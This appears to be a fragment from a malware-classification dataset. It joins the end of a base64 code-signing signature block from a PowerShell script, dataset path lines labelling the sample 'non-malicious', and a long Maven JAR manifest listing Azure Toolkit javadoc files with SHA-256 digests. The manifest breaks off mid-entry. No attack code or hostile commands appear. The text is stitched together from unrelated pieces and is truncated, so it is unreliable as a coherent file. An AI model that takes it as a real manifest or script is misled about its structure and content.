Fv/glTjgOSnvFh3mK6ge1RicMM3VTlq/fA5vSiu69a+4swD4QJBUY7k+61Fk5XlZ # u6ho9FxO1O8OMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAH/Ejh898Fl1qEAAQAAAf8wDQYJYIZIAWUDBAIBBQCgggFKMBoG # CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQghtdb2tZ6 # OEULbT7JQ7w9BGoI0lM1yocSgLBs5PZEiXgwgfoGCyqGSIb3DQEJEAIvMYHqMIHn # MIHkMIG9BCDkMu++yQJ3aaycIuMT6vA7JNuMaVOI3qDjSEV8upyn/TCBmDCBgKR+ # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB/xI4fPfBZdahAAEA # AAH/MCIEIO0+ZZpc8738ZRzG1JkViDUqNGwOmGhcvuJkD9cXZckbMA0GCSqGSIb3 # DQEBCwUABIICABuDbmCOzaiLAz+nCjA6NkLq0xkBEw/F6mHpr9F/DHHki02KpIjk # bXO2loQL9tXH0ZM2XX+SNxmwWyZqMrgaZvny1YqhtDUMs41V6A3UDdj9xHv1xAc+ # PJtDW0LsAfIEkrmPIrsRQHhQfXu+dmLw6R3md41X8HvOJWPk4u9h/0f47OkAbREr # VDyg6LfTd1rRUauSpAevcgEn+Su+tQUfVgjB4nZkBB+ysItmTA1BA0KohRK5lXj5 # 8Ps3NaQxKpn5kt7R419jvVy3A1Dfc4KNP19EzTPe8aDD3a5HiYxxsHGtJG3r81kR # /n8JAOovcDsI0SJMW5ACXbNhv79WR2cw2pAcVc7BDq2icVPj/hOqAz2jDkFXHW6L # Debjv1d4CTSpqtcf7yj4PGGhJhCxi3gmLCHe5zSjtjkqa/A7R27Ld/RVRPVu5E57 # g9BcVLZjbsHzQu4rc2ak4inea//sc6bxIrwlrVCHamFLdMAaR8WEnseavqF8GVxS # /JHXo8Jps+aHbu+LXB7stW47Il5FLGkYmZv2V6G6ZoGHgsM4k0vSOO2cssf0oI9E # WapZGov4VrABGRAsdwlmoAi/CDDEphT9csd2jTDiwBu7NBcgDf2dAlPfF/MVW+3z # oLAjxdYM06HB4ixcOxCtIse7N1QDv8ihbnJeo4BeWF6slHzRzzxdF4QE # SIG # End signature block
combined_dataset/train/non-malicious/sample_16_25.ps1
sample_16_25.ps1
Manifest-Version: 1.0 Archiver-Version: Plexus Archiver Built-By: vsts Created-By: Apache Maven Build-Jdk: 11.0.21 Name: com/microsoft/azure/toolkit/lib/appservice/deploy/FlexFunctionDe ployHandler.html SHA-256-Digest: hWh6bXy5Ig28HsqQWMIuLTIM/NEKTGekpbZxQzgnnu4= Name: jquery/jszip-utils/dist/jszip-utils.js SHA-256-Digest: wG92XzvtRWQ2qIGbTUH7pm5TfYjJDE9G65XWBMlAhuM= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/package-tree.h tml SHA-256-Digest: ee8LRwjYvGy+QX2BfDcfjzJNjEP26KFXIZQ90v1O2uY= Name: com/microsoft/azure/toolkit/lib/appservice/function/AzureFunctio ns.html SHA-256-Digest: 3LybS58LlyBW8emA4h5vLDHjN3ZF5IaO6n0ez5xCgvo= Name: com/microsoft/azure/toolkit/lib/legacy/function/utils/FunctionUt ils.html SHA-256-Digest: ZKW1Bnd/AXABxv98lu2XgE7LYxQCRVfKJHwRY2afh0w= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/Binding Template.html SHA-256-Digest: rFzj4wMWwIOPfTkJQm1wsdnJCEJZTRIDnyAqhldWPCk= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/class-use/Depl oyUtils.html SHA-256-Digest: YEDvKlSSiDgIPKdu3zq1fqYp8kSUrzUTpsEbZzx/d1I= Name: com/microsoft/azure/toolkit/lib/appservice/plan/class-use/AppSer vicePlanDraft.html SHA-256-Digest: NAYI080wLRk9k7NnQdm9iQq5t1WdO7Uw7neMFEx0QgU= Name: com/microsoft/azure/toolkit/lib/legacy/function/configurations/p ackage-summary.html SHA-256-Digest: STmXn3lcfAx+nQqvar5H2wh/SA3gCbTOCr0+qoXsr/I= Name: com/microsoft/azure/toolkit/lib/appservice/file/class-use/AzureF unctionsAdminClient.html SHA-256-Digest: jwQy9ZADY5aqLD7ZV0mqvJfcD0V5UGA4VCccPe+Oc8U= Name: com/microsoft/azure/toolkit/lib/appservice/model/OperatingSystem .html SHA-256-Digest: d07oxc0rNbbzI5BXjOp3R42SwxflgFsMotWg0wRMAMI= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/Functio nAnnotation.html SHA-256-Digest: Y0SPaAE0nASMqgtSTbHEh0jd/9rzmMDKOAllOF81xfI= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/Templat eMetadata.html SHA-256-Digest: Xbcfpi6XZ6aKUo8GrTGBb/OFSziO7sPCtm7ZiXroi2o= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Deplo ymentBuildStatus.html SHA-256-Digest: TbDO/nMCdgQeViegqFmPWETOegE9VG+12nJlHvZJZOA= Name: com/microsoft/azure/toolkit/lib/appservice/config/RuntimeConfig. html SHA-256-Digest: S7HTgD0hhtVSaSrBsFOJJonDA2ky6nEFEYHAenm+amA= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/Binding .html SHA-256-Digest: UqHY3pd8aKZf3bh8AUsOgekoWT2JW/eGXkTY4/Cg3z8= Name: com/microsoft/azure/toolkit/lib/legacy/function/configurations/c lass-use/FunctionConfiguration.html SHA-256-Digest: 5QKUA+3KCx5K+EUS35CIonF/cUhMrZ6m7DowGdURRMs= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/class-u se/BindingEnum.html SHA-256-Digest: uH+K14IAu0f6UdXcsKj357A1VwMJAeEP07hbsuNxOFA= Name: com/microsoft/azure/toolkit/lib/appservice/task/class-use/Deploy WebAppTask.html SHA-256-Digest: 5N4vl0aXobPg/M7QPYlRneDxS8oW1Vym9HKr6Iq9Jy8= Name: com/microsoft/azure/toolkit/lib/legacy/function/configurations/p ackage-use.html SHA-256-Digest: xZeRqkmcvy0uBkQj50gn7KdYU8bYC6qDuJYU9fItBIw= Name: com/microsoft/azure/toolkit/lib/appservice/config/package-tree.h tml SHA-256-Digest: 6h4wEICPxxN/sRrqX9nrzuOWoRtoaeTHNJcee/5oC5c= Name: com/microsoft/azure/toolkit/lib/appservice/config/AppServicePlan Config.html SHA-256-Digest: EuBUZpyST67Iljhx4qR6bzlBoax8dD5ssi2gf3NTpIA= Name: com/microsoft/azure/toolkit/lib/appservice/config/class-use/AppS erviceConfig.html SHA-256-Digest: PmnR5U7Bz7zy+Xov8E4OoYXOkfWB8DzRJIxDRghkHe8= Name: constant-values.html SHA-256-Digest: GCtQzJKVYBGBrFRFZkpIXgWLJGYt5jBLpxFDv2IcG6M= Name: com/microsoft/azure/toolkit/lib/appservice/model/Runtime.html SHA-256-Digest: bthWpiJ1vKO3fJ/xSNulywrxx3PFsNLmr1QadtGSFEo= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/package-use.ht ml SHA-256-Digest: 7tA+W5gFufx/Dh3UmkdfwwX+WIs4veyGppi4nGStdMI= Name: com/microsoft/azure/toolkit/lib/legacy/docker/class-use/IDockerC redentialProvider.html SHA-256-Digest: 3fsaxeAUAMtjlfE6zdBGh1Th3JSlXk8LaVixA8EtaG4= Name: stylesheet.css SHA-256-Digest: MeHJ1ecg/OtbZWphNSIpo8tFUFr2xHtJeNy+ynZcs4M= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/WebAppBase.htm l SHA-256-Digest: CZ0ouGLvSAtvC4Ou1HTZtOPUitzPmbmKXUAbccNnCsg= Name: com/microsoft/azure/toolkit/lib/legacy/function/handlers/package -summary.html SHA-256-Digest: Rex+yi1MiTk4AxPz3vWuvpmQ3I5LIw94C/41X0m19Gs= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/class-u se/BindingTemplate.html SHA-256-Digest: IiGh/6iVsz5MJiarkfFnYUhPBfiAZsFwmoosAfQPzTU= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/handlers/artif act/package-tree.html SHA-256-Digest: 364wa+CdiEKIfMpEMNOUKvnMHSjGq5O7J6f0NctBKf8= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/IAnnota table.html SHA-256-Digest: 8eUGyF/lLbssWb4eaXq2rsc7wa6l1XqATdmgFzbfgPg= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/JavaV ersion.html SHA-256-Digest: JbEikp+9/bT4VTbbgH1/O8ZnRzUa89f4T8IoyGIpTTc= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/class-use/MSFu nctionDeployHandler.html SHA-256-Digest: IeJ/aS4Q4rsaKaM4GnZEQun0VXt/2jAw5iiANdXCi1I= Name: member-search-index.zip SHA-256-Digest: i8nWBYIp7OE2FGTV2Jxsb2k4M4VU5pIcFli+juIeE5k= Name: deprecated-list.html SHA-256-Digest: YXbNevV81BIWbZy/VsX2Coc8gTi7C4keGPEL5KiNMI8= Name: com/microsoft/azure/toolkit/lib/legacy/function/utils/class-use/ CommandUtils.html SHA-256-Digest: 5J9dbki2C2AvHk1VQYGm1rAFhTJGHUVJzupcc47ZlFw= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Deplo yOptions.html SHA-256-Digest: oSVGVuojzSaLztgDsL2LMAb58q2FOyoblOiX5bHmcAA= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/IFunctionDeplo yHandler.html SHA-256-Digest: 7IAV0DCsM9IZ8EzG6g7F+PUlk9jvehqBnQ2gFYtbqQM= Name: jquery/jszip-utils/dist/jszip-utils-ie.min.js SHA-256-Digest: eUSRsihgsqkme2Mn4Zy0XLmZ0pDxZ/fIcgT/wv+H5Fc= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/Functio nTemplates.html SHA-256-Digest: AhrI7v+G2gSDuQ/rG9s+eOh4HYB1+EAYh0nipqUUqMk= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/LogLe vel.html SHA-256-Digest: FLN06nL1NUTVCNGXFPog8CKNiAKPZeeiaIBjRHECy/I= Name: com/microsoft/azure/toolkit/lib/appservice/entity/FunctionEntity .html SHA-256-Digest: i/1fviw3CkwxryZ6cDNujK/p4Dg9bTzhE7PjgfYr8p0= Name: com/microsoft/azure/toolkit/lib/appservice/file/class-use/AppSer viceKuduClient.KuduService.html SHA-256-Digest: SCgtbhrsmty+WI+uD/o87kNBFhH7hLoUkhvxbvdmYyA= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/class-u se/BindingSerializer.html SHA-256-Digest: PJas4k5VB6KGSwQ0fZ9Ldsyqw5l0xPNGLmSFTZj0SDc= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/class-u se/Binding.html SHA-256-Digest: JcGojw1MoEsgzvcOomCEYwsR26BGj74xTD5a53o6aiE= Name: legal/ASSEMBLY_EXCEPTION SHA-256-Digest: pE63tcr1U0xu9TayHttAtNa6v5G/l9nUVZaGhhiyxvs= Name: com/microsoft/azure/toolkit/lib/appservice/AppServiceAppBase.htm l SHA-256-Digest: r48Oausk06UD5Oon7SJPkWD3pkIjlXFq4k2uBjMeSlk= Name: com/microsoft/azure/toolkit/lib/appservice/model/LogLevel.html SHA-256-Digest: meUS5UZbIYX4quEK0yZXhrhl32rioHijBPTBknXPmi0= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/class-u se/ExtendedCustomBinding.html SHA-256-Digest: peoi2NidW9nsczCpsEoGD/Er+qx11dFZUNltnNMyjKU= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/Functio nTemplate.Function.html SHA-256-Digest: gixSxphCdzm8qHckSkTsnUZZCYlcIHyJTrzOu35t/5A= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/handlers/artif act/FTPUploader.html SHA-256-Digest: pM9TQbBheFsqR5su2KPVB37+PiC0pHLqfQWYqBdvfow= Name: com/microsoft/azure/toolkit/lib/appservice/function/class-use/Az ureFunctions.html SHA-256-Digest: DV7ZvAboOespmX/IKGbRUTVXWdANqfXUSgTW5NbLPaA= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/AzureFu nctionPackagerBase.html SHA-256-Digest: dld0qPEn0FHFmcXPetoZUHGTO0i/lUZSsCGmfjL8lkQ= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/package -tree.html SHA-256-Digest: tnQngcVYeEjmqDpcCdWd0i9yXrLpfA05Zj0zVu7Y2Ls= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/Extende dCustomBinding.html SHA-256-Digest: lzgMzRXFjZa9JJStYd8Uave5M1oJxvtfl0M2Nl/ag+Q= Name: legal/jszip.md SHA-256-Digest: my3h+rowtA0qwC0oFKwpVdz9AWiRCnt6/1QnjJ7hE7E= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/class-use/WebA ppDeploymentSlotDraft.html SHA-256-Digest: qv10F9tUX5T6ypatDLXkbcZy4zZzRWXQEB+8wz057Sk= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Opera tingSystem.html SHA-256-Digest: 0kK09pHqlUaIo/LzFP5IXwkuYK4MNuhCT6MnSEex5q8= Name: com/microsoft/azure/toolkit/lib/appservice/file/AppServiceKuduCl ient.KuduService.html SHA-256-Digest: J5LVlDM0yqLETxBeUcWlQ2uceKC5HroolosVRHS1NFs= Name: com/microsoft/azure/toolkit/lib/appservice/function/class-use/Fu nctionAppDeploymentSlotDraft.Config.html SHA-256-Digest: YkUT5PEr+dfFl/eT2Q1xxyYNX4XmuH7Y8XAQk9Z+fxk= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/class-u se/FunctionTemplate.Function.html SHA-256-Digest: ZfqOHK3XfVCcQt7h6pa064U3DSO94ThAD+84vVfSf2U= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Diagn osticConfig.html SHA-256-Digest: 9PyobS063f/uLpmw9JnzkhqMzOLsJ7taD514AUehUCk= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/package -use.html SHA-256-Digest: ecNGdSujMIK7zJ4ndhqXv82pJWvRmqA8Y0X+zYnMUoU= Name: com/microsoft/azure/toolkit/lib/legacy/function/handlers/class-u se/AnnotationHandler.html SHA-256-Digest: 1uF4bUdpLZVyvE4b2Kv/GKRYYkEX5HPKkilFEq0EM6o= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/handlers/artif act/package-use.html SHA-256-Digest: z42AFvnK4GgmtBA4zgQbfayUQmQMVDZ/vcKhd1hPrv8= Name: com/microsoft/azure/toolkit/lib/appservice/IDeploymentSlotModule .html SHA-256-Digest: GO1kZcJ8uBjeT5iMG9wQBhDAV2P/tYzk7TJZP8T7U6g= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/DeployUtils.ht ml SHA-256-Digest: wp8euxMp9r5l39Kw6svjAFlkMNN1dToq5bOG5Lmm5DE= Name: com/microsoft/azure/toolkit/lib/legacy/function/configurations/R etry.html SHA-256-Digest: CJFXJ7rafgA2CSchSZNP1ZgWW7SV628md6k87fT3TRc= Name: com/microsoft/azure/toolkit/lib/appservice/plan/AppServicePlan.h tml SHA-256-Digest: XMo2fSSfFRmrQNDE44tcv5ID1Mxt5iH2fDUwEZ8tJWU= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/WebAppModule.h tml SHA-256-Digest: +oYscjUts7ocuV11axYgyGQ650WYV2QvooFw+e+TjJc= Name: com/microsoft/azure/toolkit/lib/appservice/config/class-use/AppS ervicePlanConfig.html SHA-256-Digest: UqVEKQhTc0Lq0zfzB7xTRgHqGJsw8m5sm3CZSHqVJeg= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/RunFromZipFunc tionDeployHandler.html SHA-256-Digest: +kMFER3rPzL8rkVhWmgslo0Z7pFq8aZ891xZoqGJTnA= Name: com/microsoft/azure/toolkit/lib/appservice/plan/class-use/AppSer vicePlan.html SHA-256-Digest: mfzNalFK4TFYBHPC7xHBgO3EtfvPpHiSSlFDlxNz5R8= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/package-use.ht ml SHA-256-Digest: 5dzU3dXuru/jiC4OwgH0l3UkKuJeQYyAEEzH+pRI3cw= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/class-use/FTPF unctionDeployHandler.html SHA-256-Digest: vZ0HX0kzL7yKPMg1OuGDxdOhec0617y/blHGOgYwRNE= Name: com/microsoft/azure/toolkit/lib/appservice/file/class-use/AppSer viceKuduClient.CommandRequest.html SHA-256-Digest: DI7VV4PhDSeESWDQFRcLLdmaLddq0OwqAxYd+dLvsJE= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/MSFunctionDepl oyHandler.html SHA-256-Digest: POKeUSoGWhqymXRIRw8aGZcNh7/Ew8F7QS+AkbQoFvg= Name: com/microsoft/azure/toolkit/lib/legacy/function/utils/package-tr ee.html SHA-256-Digest: wxKUC31t7FA6Ti6v5cPsibpFslNIT4UWZEbPX1fDMn4= Name: com/microsoft/azure/toolkit/lib/appservice/utils/Utils.html SHA-256-Digest: ALB/QSM78B5nfMenYjFaKHSTNmkkJcfW27M52Fmrkts= Name: com/microsoft/azure/toolkit/lib/appservice/entity/package-summar y.html SHA-256-Digest: E/FC8vsH0ZNpXxDO2dQic5J9Chp95YkvUiSkjljUSNs= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/Extende dCustomBinding.html SHA-256-Digest: B1NoA3z7jWcmSngoGH+2ivmE3GKO2Hz4kvt0Tw6o+1c= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/package-summar y.html SHA-256-Digest: 13RmwXmo4xlmfVlSGn3heLWxV0cwcuVG25zpjuIGrU4= Name: legal/pako.md SHA-256-Digest: QHDjcrsDi/NcHOhII877usg69zA1eUbcj+270rem5Vw= Name: com/microsoft/azure/toolkit/lib/appservice/entity/package-use.ht ml SHA-256-Digest: q4wb6fk6WZv3kAFQI/VGIYHZllNWg4+pIwS2ydefFIs= Name: com/microsoft/azure/toolkit/lib/appservice/package-tree.html SHA-256-Digest: Us6u3NxBSpk1ADtX8FLgqc8dXw6OzdfOt7019dFbfZU= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/Binding Enum.html SHA-256-Digest: H1afJXuZq/yDBWWSaN4HdYk+4HlTgU77oQ68z0tDUcU= Name: com/microsoft/azure/toolkit/lib/appservice/utils/class-use/Utils .html SHA-256-Digest: IvpCXIjBlatFHBeRzeUUMSuMchUxq189NWtg84JwRSI= Name: com/microsoft/azure/toolkit/lib/appservice/plan/class-use/AppSer vicePlanModule.html SHA-256-Digest: Zi5oWU65uhyQZxzwatwtJ90mA46UczVxXiR1ay2dOVg= Name: com/microsoft/azure/toolkit/lib/appservice/plan/package-tree.htm l SHA-256-Digest: vYZBVMpL/g2OlensVdZjNPgVqertK24dFnXJm0TjKqI= Name: com/microsoft/azure/toolkit/lib/appservice/file/IFileClient.html SHA-256-Digest: F9+3396LFjkh39rGpQ0KSCDpWgQ36kpjsefGptz2rlE= Name: com/microsoft/azure/toolkit/lib/appservice/function/FunctionAppB ase.html SHA-256-Digest: mBiOJXICrVXN3V83YdqqSazo28CQSr8EdlMHjsCMlDQ= Name: com/microsoft/azure/toolkit/lib/appservice/plan/AppServicePlanMo dule.html SHA-256-Digest: rMupu9fMNo23kwVIV9opL2PENNwMubvbdxmXLf6AVg8= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/package -summary.html SHA-256-Digest: wIBU4z6fTeM3q3ZplRQ/EH+xjr/FHPsAy3FQkVb/v0M= Name: com/microsoft/azure/toolkit/lib/legacy/function/class-use/Consta nts.html SHA-256-Digest: DGKrwvPvttnKR92EHENpu7SGcUENyLAwM5ssk6EM/ug= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/Validat orTemplate.html SHA-256-Digest: PQRy3L+QNuJNO6iIjkRTl6K18gHg5Dcjr6M/g+YXTXY= Name: com/microsoft/azure/toolkit/lib/appservice/model/package-tree.ht ml SHA-256-Digest: xb4c7cfJkQaA7UgQ0Uthh07bY4JEGg6YKpRMySh8BEg= Name: com/microsoft/azure/toolkit/lib/appservice/model/DeployType.html SHA-256-Digest: 8IByMMpB2KTjbVX2algHkqjcIF0XcZM4DqA48A1gO6Y= Name: com/microsoft/azure/toolkit/lib/appservice/model/AppServiceFile. html SHA-256-Digest: v468VdOBAmT1S0eeMeT2nhfi2PXFc7c3DFYBsizWBuw= Name: com/microsoft/azure/toolkit/lib/appservice/file/IProcessClient.h tml SHA-256-Digest: 980QsGY/k9vERK6LTHje0Gi+9RFp5OzU+HytLAtXRAU= Name: index.html SHA-256-Digest: bNzIOCe36fH3F4uItrtKahBVFxLEJJgBKhpNuqUHwZ0= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/package -tree.html SHA-256-Digest: Kh0LiVituWuz2Hljs+vSZXCPppEfojUENMhaiCyCYSc= Name: com/microsoft/azure/toolkit/lib/appservice/model/JavaVersion.htm l SHA-256-Digest: c7Njs41A60q9dUy1Y90gaVICLnAw4WTtLy/OmIXDv28= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/class-u se/BindingConfiguration.html SHA-256-Digest: xVMyrIKEyXnWYy9Mu0GK1m+p79IayfV+wdbZtjtvvfg= Name: com/microsoft/azure/toolkit/lib/appservice/function/impl/class-u se/DefaultFunctionProject.html SHA-256-Digest: A7tSzu4XhIOCqfycm8YQT96YX1I20AFR3ajGgqbo31s= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/Functio nAnnotationClass.html SHA-256-Digest: BZILJb60E6Uswhh0RM/uWSVpiPmIQQ3SSDwaGiTKgF0= Name: com/microsoft/azure/toolkit/lib/legacy/function/configurations/F unctionExtensionVersion.html SHA-256-Digest: XihJRu1RGRACOufqPjotSu7A0AU/RluZjoaemLUfnOo= Name: com/microsoft/azure/toolkit/lib/legacy/function/class-use/AzureS torageHelper.html SHA-256-Digest: h+zAaZF44RfJOeqRivkFgG2GTJR49TWWhRv4kVT46oY= Name: jquery-ui.overrides.css SHA-256-Digest: B/EGl0kMvmDh9FP0poteQX0pfC8t1R88vnk+VMPFdk0= Name: com/microsoft/azure/toolkit/lib/appservice/file/package-use.html SHA-256-Digest: BRgcyebfI6AINE+KqvDn19WHZvqq2Cu1DXkZQu/l+y0= Name: com/microsoft/azure/toolkit/lib/appservice/utils/AppServiceUtils .html SHA-256-Digest: ak2w3xvv6v1zyVacIwl64wuiIRH5CAUleDKho76XeAM= Name: com/microsoft/azure/toolkit/lib/appservice/task/DeployFunctionAp pTask.html SHA-256-Digest: k7SfgTXe7Zu4yk/fDFmmOrFPGW0sjcDNGEyf20zUtkw= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Deplo yType.html SHA-256-Digest: oTkcitPQNdmQSaaCAxnjRNr6TkPZc6+ZfALqG2aUNOo= Name: com/microsoft/azure/toolkit/lib/appservice/model/ProcessInfo.htm l SHA-256-Digest: 336hjHaVR4fxiUuJ3DYw94Sp+fSTGvbGfiIiuYkgLcc= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/package-use.ht ml SHA-256-Digest: uSz2t4uY0H+aLq4TG8ntKPTkt6ibZ8oNTrjel7FzP0o= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/AzureFu nctionPackager.AzureFunctionPackagerHolder.html SHA-256-Digest: SiBZAnrEM/I+AvEwT3WggTbJf2bsdVEKhzhVeYDjYCM= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/class-u se/FunctionTemplate.html SHA-256-Digest: HOglTrKPGq4MW8euihLpRlOSHOi0GCiDFjh21HbmyJs= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/class-use/WebA ppDeploymentSlot.html SHA-256-Digest: KtlREg0vVBfdDQGEuCaWkjoZtsH7NdIY4WH9pM+wdy0= Name: com/microsoft/azure/toolkit/lib/legacy/function/handlers/class-u se/FunctionCoreToolsHandlerImpl.html SHA-256-Digest: ibNOSBz0E/SenFeKxdG2X3E2zTU4Jm90MU2c9qBGuv4= Name: com/microsoft/azure/toolkit/lib/appservice/model/WebContainer.ht ml SHA-256-Digest: podBLNq99PzASh4m+YP2zBE9vBelCXLqzrf/sIHoCfI= Name: com/microsoft/azure/toolkit/lib/legacy/function/handlers/class-u se/FunctionCoreToolsHandler.html SHA-256-Digest: sRBzHFJCChoP+D1leSnrP/3VRdNGwdt0BVtWelGnhr0= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/class-use/ZIPF unctionDeployHandler.html SHA-256-Digest: EmzAAisVqxuthGTrxeQ2AynWquKGcvjVq9MUxGbvxt8= Name: jquery/jszip/dist/jszip.js SHA-256-Digest: X43686CAFKYNlMe7xpaBSB7ecqYmMH5AIivzcaptUZI= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/class-u se/BindingEnum.Direction.html SHA-256-Digest: hhSM8PlFVDxfynbr65+dZjcYAuld8tih140HpCigEr0= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/Binding Factory.html SHA-256-Digest: aS1LHXSAZU7oOopZAm/pgeNDt6YrZQxriH6ZmqLaioI= Name: com/microsoft/azure/toolkit/lib/appservice/file/class-use/IFileC lient.html SHA-256-Digest: Jm+1yQMQE4YuZGfoA/2ynieiKcuOGZGNaYLG8lRISCA= Name: search.js SHA-256-Digest: lr7xMOs5czMoN8+3p4987/vvCh+p+1wJxNc3R4l87DY= Name: jquery/jquery-ui.min.css SHA-256-Digest: z9VsdYFOjdR0vVO2IrGRUmUMVZXPPIv616hwOYUQXoo= Name: com/microsoft/azure/toolkit/lib/legacy/function/package-use.html SHA-256-Digest: B9YMifWmfrVk6RyqfX9IArbhPM7k2SdSNFqV+RQD2E8= Name: com/microsoft/azure/toolkit/lib/appservice/function/class-use/Fu nctionAppDeploymentSlot.html SHA-256-Digest: 1G8K4cErsbBG4xHq+hFlehu745zhajOHnfmFBzMc0wc= Name: com/microsoft/azure/toolkit/lib/legacy/function/configurations/c lass-use/Retry.html SHA-256-Digest: /Q9FdzrQ9hT6U3dtgbcJ9F5Hxrnfi1/VTcYB1pFqHi4= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/Binding sTemplate.html SHA-256-Digest: KhBFUFsvVz2jaJdIfh8wqbnu482cUfiVOqX0Cqnaw3U= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Runti me.html SHA-256-Digest: xBqxSwewh8JqZRFv1zBIwJ0xt8UUG3orswLZO0atDsQ= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/class-u se/FunctionSettingTemplate.SettingEnum.html SHA-256-Digest: PdQCbSXp5iEmk2ulRkWLYyGGB+bI/pRmISJX3IH3fmM= Name: com/microsoft/azure/toolkit/lib/appservice/task/StreamingLogTask .html SHA-256-Digest: v0RvxFP2stNAMh0L2A4HYZFVhmW3jZnyIeGWkWvbRu0= Name: index-all.html SHA-256-Digest: nKG1+wDa2FriYUQS5f8ZeNqwuNgevIOborA+J0pdJoI= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/class-use/WebA ppServiceSubscription.html SHA-256-Digest: NqEE+AI8b7oP6CMUrUrZQ/O5cqntqOvR5vpkbLgNIkA= Name: com/microsoft/azure/toolkit/lib/appservice/function/class-use/Fu nctionApp.html SHA-256-Digest: UoRaWX5PFUFhzvLJUVG5m41f/7Hisz0QdQJdu2WSiOM= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/WebAppServiceS ubscription.html SHA-256-Digest: 7eBxO69QQEo3JXzn7NCAlRn03rJ2KcN3tbA13e6S+88= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/class-use/WebA ppDraft.html SHA-256-Digest: Zx6xlLCYYgCcVJIE42aNfBbgxzavRLQA1KYRukMbWe8= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/package -summary.html SHA-256-Digest: cOLEYqGFK6TWRNAgPXe+KyK/znXmnA1QJHvvKhn3vTk= Name: com/microsoft/azure/toolkit/lib/appservice/model/AppServiceFile. Type.html SHA-256-Digest: Kfyyhh9X12UF2tJMSudna+w7H0S7qM6gH1ep+Zfz+H4= Name: com/microsoft/azure/toolkit/lib/legacy/function/bindings/package -summary.html SHA-256-Digest: TeAMvXbCj8SZ6A7qR8MhjBcH/YfmJ4nektAsBzx5/kE= Name: com/microsoft/azure/toolkit/lib/appservice/model/WebAppArtifact. html SHA-256-Digest: yYk5oV9NJZUGey5Jcy5KNWhNPjB9d14vwMRRTwwNJBc= Name: com/microsoft/azure/toolkit/lib/appservice/model/TunnelStatus.ht ml SHA-256-Digest: f97lcxwCyZyfK4PJPG37o/DvgYTjSBJjf9bigmrS3hU= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/class-use/WebA ppModule.html SHA-256-Digest: seB3hgGV2CPtwMazXYiwD9Nl2jyeCJ2tfQnYe3eBBZE= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/AzureWebApp.ht ml SHA-256-Digest: 792/JAxGJHYpONk1c64E4T9EXZafFyyT+aJEdaRfmcI= Name: com/microsoft/azure/toolkit/lib/appservice/entity/package-tree.h tml SHA-256-Digest: 